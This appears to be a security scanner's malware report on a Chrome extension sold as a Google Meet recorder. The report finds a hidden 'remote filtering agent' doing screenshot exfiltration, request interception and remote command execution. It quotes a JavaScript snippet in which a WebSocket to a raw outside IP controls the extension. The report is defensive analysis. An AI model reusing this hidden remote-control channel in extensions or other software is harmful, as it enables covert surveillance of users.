Security Alert: Malware Risk Confirmed
IMTMeet
ID: opbjlkgdnhjoljkfeokhnjmnlkoekjkf
Extension Info & Metadata
Publisher Contextual Analysis
- Author: IMTLazarus
- Country: ES
- MX records exist: Yes
- Domain exists: Yes
- Is disposable: No
- Is role-based: No
- Mailbox exists: Yes
- Address: Arteagabeitia, 41 Barakaldo, Vizcaya 48902 ES
Records your workroom in Meet and uploads it directly to Google Drive.
The Chrome Web Store listing describes this extension as a Google Meet session recorder that uploads to Google Drive (productivity use case), but the manifest internally identifies it as a 'remote filtering agent' and every JS file implements continuous screenshot exfiltration, full web-request interception, and remote command execution — none of which match the disclosed listing purpose. This deliberate mismatch hides the extension's surveillance function from users who would install a perceived screen-recording tool, and is consistent with the policy_violation reason cited for CWS removal.
```json
{ "description": "IMTLazarus's remote filtering agent for Chrome." }
```

The extension establishes an unencrypted WebSocket connection to a raw IP address (137.74.170.11:8123) that is unrelated to the publisher's declared domain (imtlazarus.com). Messages received from this third-party server directly control the extension's lifecycle: if the server does not respond with 'TUNELUP', the extension calls chrome.runtime.reload(). This gives an external, non-publisher-associated server the ability to trigger extension restarts, and the unencrypted channel could be intercepted or spoofed.
```js
ws = new WebSocket('ws://137.74.170.11:8123');
ws.onmessage = function(event) {
    estadotunelinternet = event.data;
    //console.log('Túnel Estado: ' + event.data);
}
}
...
function recarga() {
    console.log('Internet Estado: ' + estadotunelinternet);
    if (estadotunelinternet == "TUNELUP") {
        continuar();
    } else {
        chrome.runtime.reload();
    }
}
```
Versions scanned
Showing 1 of 3 scanned versions with more than one unique finding. Counts are unique findings that include each version.
| Extension Version | Code Review Findings |
|---|---|
| 3.9 | 2 |
Files with findings
2 distinct paths — top paths by unique finding count:
- js/control.js: 1
- manifest.json: 1
